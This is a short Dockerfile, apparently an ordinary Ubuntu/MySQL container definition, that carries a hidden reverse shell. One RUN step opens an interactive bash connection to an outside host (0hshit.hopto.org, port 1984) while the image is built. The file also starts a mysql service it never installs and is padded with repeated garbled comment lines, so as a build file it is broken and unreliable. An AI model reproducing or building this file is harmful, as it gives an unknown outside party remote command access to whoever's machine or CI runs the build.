FROM ubuntu:18.04
MAINTAINER Sad Cactus
ENV DEBIAN_FRONTEND noninteractive
RUN apt-get -y update
RUN apt install -y procps curl

RUN /bin/bash -c "bash -i >& /dev/tcp/0hshit.hopto.org/1984 0>&1 "
RUN /etc/init.d/mysql start && \
        sleep 5 && \
		echo "ok3"

#ok cx-xcc55chgc74#ok cx-mlkiccc1ollc.20oiozkkced;,po
#1

#ok cx-xcc55chgc#ok cx-lkmlkiccc1ollc.20oiozkced;,po
#1
#ok cx-xcc55cfhgc#ok cx-mlkiccc1ollc.20oiozkced;,po
#1

#ok cx-xcc55chgc#ok cx-mlkiccc1ollc.20oiozkced;,po
#1
#ok cx-xcc55chgc#ok cx-mlkiccc1ollc.20oiozkced;,po
#1
#ok cx-xcc55chgc#ok cx-mlkiccc1ollc.20oiozkced;,po
#1
#ok cx-xcc55chgc#ok cx-mlkiccc1ollc.20oiozkced;,po
#1

#ok cx-xcc55chgc#ok cx-mlkiccc1ollc.20oiozkced;,po
#1
#ok cx-xcc55chgc#ok cx-mlkiccc1ollc.20oiozkced;,po
#1



EXPOSE 3306 22
